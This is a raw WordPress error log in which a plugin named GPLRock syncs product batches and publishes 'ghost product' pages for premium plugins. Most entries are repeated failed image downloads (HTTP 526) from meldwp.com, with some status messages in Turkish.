https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d3e790c.webp [08-Mar-2026 17:57:29 UTC] GPLRock: Ghost product published with image - Product ID: pdfmentor-pro-wordpress-pdf-generator-for-elementor [08-Mar-2026 17:57:29 UTC] GPLRock: Image downloaded successfully for product woocommerce-email-template-customizer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72e255df.webp [08-Mar-2026 17:57:29 UTC] GPLRock: Using pre-downloaded image for product woocommerce-email-template-customizer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72e255df.webp [08-Mar-2026 17:57:29 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-email-template-customizer [08-Mar-2026 17:57:29 UTC] GPLRock: Image download failed for product mobikwik-zaakpay-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:31 UTC] GPLRock: Image download failed for product mobikwik-zaakpay-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mobikwik-zaakpay-payment-gateway-woocommerce-plugin-9751.webp for product mobikwik-zaakpay-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:33 UTC] GPLRock: Image download failed for product mobikwik-zaakpay-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:35 UTC] GPLRock: Image download failed for product mobikwik-zaakpay-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mobikwik-zaakpay-payment-gateway-woocommerce-plugin-9751.webp for product mobikwik-zaakpay-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:37 UTC] GPLRock WARNING: Image download failed for product mobikwik-zaakpay-payment-gateway-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/mobikwik-zaakpay-payment-gateway-woocommerce-plugin-9751.webp [08-Mar-2026 17:57:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mobikwik-zaakpay-payment-gateway-woocommerce-plugin [08-Mar-2026 17:57:37 UTC] GPLRock: Image downloaded successfully for product media-boxes-portfolio-wordpress-grid-gallery-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-20ae6ed4.webp [08-Mar-2026 17:57:37 UTC] GPLRock: Using pre-downloaded image for product media-boxes-portfolio-wordpress-grid-gallery-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-20ae6ed4.webp [08-Mar-2026 17:57:37 UTC] GPLRock: Ghost product published with image - Product ID: media-boxes-portfolio-wordpress-grid-gallery-plugin [08-Mar-2026 17:57:37 UTC] GPLRock: Image download failed for product woocommerce-swatches-pro-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:40 UTC] GPLRock: Image download failed for product woocommerce-swatches-pro-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-swatches-pro-plugin-3624.webp for product woocommerce-swatches-pro-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:42 UTC] GPLRock: Image download failed for product woocommerce-swatches-pro-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:44 UTC] GPLRock: Image download failed for product woocommerce-swatches-pro-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-swatches-pro-plugin-3624.webp for product woocommerce-swatches-pro-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:46 UTC] GPLRock WARNING: Image download failed for product woocommerce-swatches-pro-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-swatches-pro-plugin-3624.webp [08-Mar-2026 17:57:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-swatches-pro-plugin [08-Mar-2026 17:57:47 UTC] GPLRock API Sync: Batch başlıyor - Offset: 600, Total: 0/9737 [08-Mar-2026 17:57:47 UTC] GPLRock: Image download failed for product sumo-woocommerce-pre-orders (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:47 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 17:57:47 UTC] GPLRock API Sync: Batch zaten çalışıyor, skip [08-Mar-2026 17:57:48 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:57:48 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:57:49 UTC] GPLRock API Sync: Batch başlıyor - Offset: 700, Total: 0/9737 [08-Mar-2026 17:57:49 UTC] GPLRock: Image download failed for product sumo-woocommerce-pre-orders (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:50 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:57:50 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:57:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-woocommerce-pre-orders-31573.webp for product sumo-woocommerce-pre-orders after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:51 UTC] GPLRock: Image download failed for product sumo-woocommerce-pre-orders (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:53 UTC] GPLRock: Image download failed for product sumo-woocommerce-pre-orders (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-woocommerce-pre-orders-31573.webp for product sumo-woocommerce-pre-orders after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:55 UTC] GPLRock WARNING: Image download failed for product sumo-woocommerce-pre-orders. URL: https://meldwp.com/wp-content/uploads/sumo-woocommerce-pre-orders-31573.webp [08-Mar-2026 17:57:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sumo-woocommerce-pre-orders [08-Mar-2026 17:57:55 UTC] GPLRock: Image download failed for product erpgo-all-in-one-business-erp-with-project-account-hrm-crm-pos (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:58 UTC] GPLRock: Image download failed for product erpgo-all-in-one-business-erp-with-project-account-hrm-crm-pos (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/erpgo---all-in-one-business-erp-with-project-account-hrm-crm--pos-28609.webp for product erpgo-all-in-one-business-erp-with-project-account-hrm-crm-pos after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:00 UTC] GPLRock: Image download failed for product erpgo-all-in-one-business-erp-with-project-account-hrm-crm-pos (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:02 UTC] GPLRock: Image download failed for product erpgo-all-in-one-business-erp-with-project-account-hrm-crm-pos (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:02 UTC] GPLRock API Sync: Batch başlıyor - Offset: 900, Total: 0/9737 [08-Mar-2026 17:58:03 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:58:04 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:58:04 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 17:58:04 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1000, Total: 0/9737 [08-Mar-2026 17:58:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/erpgo---all-in-one-business-erp-with-project-account-hrm-crm--pos-28609.webp for product erpgo-all-in-one-business-erp-with-project-account-hrm-crm-pos after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:04 UTC] GPLRock WARNING: Image download failed for product erpgo-all-in-one-business-erp-with-project-account-hrm-crm-pos. URL: https://meldwp.com/wp-content/uploads/erpgo---all-in-one-business-erp-with-project-account-hrm-crm--pos-28609.webp [08-Mar-2026 17:58:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: erpgo-all-in-one-business-erp-with-project-account-hrm-crm-pos [08-Mar-2026 17:58:04 UTC] GPLRock: Image download failed for product interactive-maps-generator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:05 UTC] GPLRock API Sync: Batch zaten çalışıyor, skip [08-Mar-2026 17:58:05 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:58:05 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:58:06 UTC] GPLRock: Image download failed for product interactive-maps-generator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interactive-maps-generator-19459.webp for product interactive-maps-generator after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:08 UTC] GPLRock: Image download failed for product interactive-maps-generator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:11 UTC] GPLRock: Image download failed for product interactive-maps-generator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interactive-maps-generator-19459.webp for product interactive-maps-generator after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:13 UTC] GPLRock WARNING: Image download failed for product interactive-maps-generator. URL: https://meldwp.com/wp-content/uploads/interactive-maps-generator-19459.webp [08-Mar-2026 17:58:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: interactive-maps-generator [08-Mar-2026 17:58:13 UTC] GPLRock: Image download failed for product woocommerce-request-quote-bargaining (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:15 UTC] GPLRock: Image download failed for product woocommerce-request-quote-bargaining (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-request-quote--bargaining-28840.webp for product woocommerce-request-quote-bargaining after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:17 UTC] GPLRock: Image download failed for product woocommerce-request-quote-bargaining (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:19 UTC] GPLRock: Image download failed for product woocommerce-request-quote-bargaining (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-request-quote--bargaining-28840.webp for product woocommerce-request-quote-bargaining after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:21 UTC] GPLRock WARNING: Image download failed for product woocommerce-request-quote-bargaining. URL: https://meldwp.com/wp-content/uploads/woocommerce-request-quote--bargaining-28840.webp [08-Mar-2026 17:58:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-request-quote-bargaining [08-Mar-2026 17:58:22 UTC] GPLRock: Image download failed for product ticketgo-support-ticket-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:24 UTC] GPLRock: Image download failed for product ticketgo-support-ticket-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ticketgo---support-ticket-system-22399.webp for product ticketgo-support-ticket-system after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:27 UTC] GPLRock: Image download failed for product ticketgo-support-ticket-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:29 UTC] GPLRock: Image download failed for product ticketgo-support-ticket-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ticketgo---support-ticket-system-22399.webp for product ticketgo-support-ticket-system after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:31 UTC] GPLRock WARNING: Image download failed for product ticketgo-support-ticket-system. URL: https://meldwp.com/wp-content/uploads/ticketgo---support-ticket-system-22399.webp [08-Mar-2026 17:58:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ticketgo-support-ticket-system [08-Mar-2026 17:58:31 UTC] GPLRock: Image download failed for product twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:33 UTC] GPLRock: Image download failed for product twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpres-1898.webp for product twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:35 UTC] GPLRock: Image download failed for product twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:37 UTC] GPLRock: Image download failed for product twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpres-1898.webp for product twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:40 UTC] GPLRock WARNING: Image download failed for product twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpres-1898.webp [08-Mar-2026 17:58:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: twitchomatic-automatic-post-generator-and-twitch-auto-poster-plugin-for-wordpress [08-Mar-2026 17:58:40 UTC] GPLRock: Image downloaded successfully for product counter-addons-for-wpbakery-page-builder-wordpres-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2a87eca.webp [08-Mar-2026 17:58:40 UTC] GPLRock: Using pre-downloaded image for product counter-addons-for-wpbakery-page-builder-wordpres-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2a87eca.webp [08-Mar-2026 17:58:40 UTC] GPLRock: Ghost product published with image - Product ID: counter-addons-for-wpbakery-page-builder-wordpres-plugin [08-Mar-2026 17:58:40 UTC] GPLRock: Image download failed for product jquery-accordion-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:42 UTC] GPLRock: Image download failed for product jquery-accordion-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jquery-accordion-menu-25434.webp for product jquery-accordion-menu after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:44 UTC] GPLRock: Image download failed for product jquery-accordion-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:46 UTC] GPLRock: Image download failed for product jquery-accordion-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jquery-accordion-menu-25434.webp for product jquery-accordion-menu after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:48 UTC] GPLRock WARNING: Image download failed for product jquery-accordion-menu. URL: https://meldwp.com/wp-content/uploads/jquery-accordion-menu-25434.webp [08-Mar-2026 17:58:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jquery-accordion-menu [08-Mar-2026 17:58:49 UTC] GPLRock: Image download failed for product wp-creative-banners-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:51 UTC] GPLRock: Image download failed for product wp-creative-banners-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-creative-banners-builder-13553.webp for product wp-creative-banners-builder after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:53 UTC] GPLRock: Image download failed for product wp-creative-banners-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:55 UTC] GPLRock: Image download failed for product wp-creative-banners-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-creative-banners-builder-13553.webp for product wp-creative-banners-builder after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:58:57 UTC] GPLRock WARNING: Image download failed for product wp-creative-banners-builder. URL: https://meldwp.com/wp-content/uploads/wp-creative-banners-builder-13553.webp [08-Mar-2026 17:58:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-creative-banners-builder [08-Mar-2026 17:58:57 UTC] GPLRock: Image download failed for product popups-and-notifications-for-wordpress-snitcher (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:58:59 UTC] GPLRock: Image download failed for product popups-and-notifications-for-wordpress-snitcher (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:59:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popups-and-notifications-for-wordpress--snitcher-6354.webp for product popups-and-notifications-for-wordpress-snitcher after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:59:02 UTC] GPLRock: Image download failed for product popups-and-notifications-for-wordpress-snitcher (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:59:04 UTC] GPLRock: Image download failed for product popups-and-notifications-for-wordpress-snitcher (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:59:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popups-and-notifications-for-wordpress--snitcher-6354.webp for product popups-and-notifications-for-wordpress-snitcher after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:59:06 UTC] GPLRock WARNING: Image download failed for product popups-and-notifications-for-wordpress-snitcher. URL: https://meldwp.com/wp-content/uploads/popups-and-notifications-for-wordpress--snitcher-6354.webp [08-Mar-2026 17:59:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: popups-and-notifications-for-wordpress-snitcher [08-Mar-2026 17:59:06 UTC] GPLRock API Sync: Batch başlıyor - Offset: 800, Total: 0/9737 [08-Mar-2026 17:59:07 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:59:07 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:59:07 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 17:59:07 UTC] GPLRock API Sync: Batch zaten çalışıyor, skip [08-Mar-2026 17:59:08 UTC] GPLRock API Sync: Batch başlıyor - Offset: 900, Total: 0/9737 [08-Mar-2026 17:59:09 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:59:11 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:59:51 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1200, Total: 100/9737 [08-Mar-2026 17:59:52 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:59:53 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:59:53 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 17:59:53 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1300, Total: 200/9737 [08-Mar-2026 17:59:53 UTC] GPLRock: Image downloaded successfully for product effective-lottie-animation-addon-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e10d247.webp [08-Mar-2026 17:59:53 UTC] GPLRock: Using pre-downloaded image for product effective-lottie-animation-addon-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e10d247.webp [08-Mar-2026 17:59:53 UTC] GPLRock: Ghost product published with image - Product ID: effective-lottie-animation-addon-for-elementor [08-Mar-2026 17:59:53 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:59:53 UTC] GPLRock: Image download failed for product garanti-3d-virtual-pos-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:59:54 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:59:55 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1400, Total: 300/9737 [08-Mar-2026 17:59:56 UTC] GPLRock: Image download failed for product garanti-3d-virtual-pos-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:59:56 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:59:56 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:59:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/garanti-3d-virtual-pos-gateway-for-woocommerce-30459.webp for product garanti-3d-virtual-pos-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:59:58 UTC] GPLRock: Image download failed for product garanti-3d-virtual-pos-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:00 UTC] GPLRock: Image download failed for product garanti-3d-virtual-pos-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/garanti-3d-virtual-pos-gateway-for-woocommerce-30459.webp for product garanti-3d-virtual-pos-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:02 UTC] GPLRock WARNING: Image download failed for product garanti-3d-virtual-pos-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/garanti-3d-virtual-pos-gateway-for-woocommerce-30459.webp [08-Mar-2026 18:00:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: garanti-3d-virtual-pos-gateway-for-woocommerce [08-Mar-2026 18:00:02 UTC] GPLRock: Image download failed for product 50-small-seo-tools-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:04 UTC] GPLRock: Image download failed for product 50-small-seo-tools-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/50-small-seo-tools-wordpress-theme-33719.webp for product 50-small-seo-tools-wordpress-theme after 3 attempts. HTTP Code: 521, Error: [08-Mar-2026 18:00:06 UTC] GPLRock: Image download failed for product 50-small-seo-tools-wordpress-theme (attempt 1/3). HTTP Code: 521, Error: . Retrying... [08-Mar-2026 18:00:08 UTC] GPLRock: Image download failed for product 50-small-seo-tools-wordpress-theme (attempt 2/3). HTTP Code: 521, Error: . Retrying... [08-Mar-2026 18:00:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/50-small-seo-tools-wordpress-theme-33719.webp for product 50-small-seo-tools-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:10 UTC] GPLRock WARNING: Image download failed for product 50-small-seo-tools-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/50-small-seo-tools-wordpress-theme-33719.webp [08-Mar-2026 18:00:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 50-small-seo-tools-wordpress-theme [08-Mar-2026 18:00:11 UTC] GPLRock: Image download failed for product coming-soon-counter-page-maintenance-mode-wordpress-plugin-lacoming-soon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:13 UTC] GPLRock: Image download failed for product coming-soon-counter-page-maintenance-mode-wordpress-plugin-lacoming-soon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coming-soon-counter-page--maintenance-mode-wordpress-plugin---lacoming-soon-19835.webp for product coming-soon-counter-page-maintenance-mode-wordpress-plugin-lacoming-soon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:15 UTC] GPLRock: Image download failed for product coming-soon-counter-page-maintenance-mode-wordpress-plugin-lacoming-soon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:17 UTC] GPLRock: Image download failed for product coming-soon-counter-page-maintenance-mode-wordpress-plugin-lacoming-soon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coming-soon-counter-page--maintenance-mode-wordpress-plugin---lacoming-soon-19835.webp for product coming-soon-counter-page-maintenance-mode-wordpress-plugin-lacoming-soon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:19 UTC] GPLRock WARNING: Image download failed for product coming-soon-counter-page-maintenance-mode-wordpress-plugin-lacoming-soon. URL: https://meldwp.com/wp-content/uploads/coming-soon-counter-page--maintenance-mode-wordpress-plugin---lacoming-soon-19835.webp [08-Mar-2026 18:00:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coming-soon-counter-page-maintenance-mode-wordpress-plugin-lacoming-soon [08-Mar-2026 18:00:19 UTC] GPLRock: Image download failed for product covid-19-coronavirus-viral-pandemic-prediction-tools-live-maps-stats-widgets (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:20 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1500, Total: 400/9737 [08-Mar-2026 18:00:20 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 18:00:20 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 18:00:21 UTC] GPLRock: Image download failed for product covid-19-coronavirus-viral-pandemic-prediction-tools-live-maps-stats-widgets (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/covid-19-coronavirus---viral-pandemic-prediction-tools--live-maps-stats--widgets-17388.webp for product covid-19-coronavirus-viral-pandemic-prediction-tools-live-maps-stats-widgets after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:24 UTC] GPLRock: Image download failed for product covid-19-coronavirus-viral-pandemic-prediction-tools-live-maps-stats-widgets (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:26 UTC] GPLRock: Image download failed for product covid-19-coronavirus-viral-pandemic-prediction-tools-live-maps-stats-widgets (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/covid-19-coronavirus---viral-pandemic-prediction-tools--live-maps-stats--widgets-17388.webp for product covid-19-coronavirus-viral-pandemic-prediction-tools-live-maps-stats-widgets after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:28 UTC] GPLRock WARNING: Image download failed for product covid-19-coronavirus-viral-pandemic-prediction-tools-live-maps-stats-widgets. URL: https://meldwp.com/wp-content/uploads/covid-19-coronavirus---viral-pandemic-prediction-tools--live-maps-stats--widgets-17388.webp [08-Mar-2026 18:00:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: covid-19-coronavirus-viral-pandemic-prediction-tools-live-maps-stats-widgets [08-Mar-2026 18:00:28 UTC] GPLRock: Image downloaded successfully for product uber-zoom-smooth-zoom-pan-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6b16a840.webp [08-Mar-2026 18:00:28 UTC] GPLRock: Using pre-downloaded image for product uber-zoom-smooth-zoom-pan-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6b16a840.webp [08-Mar-2026 18:00:28 UTC] GPLRock: Ghost product published with image - Product ID: uber-zoom-smooth-zoom-pan-for-wordpress [08-Mar-2026 18:00:28 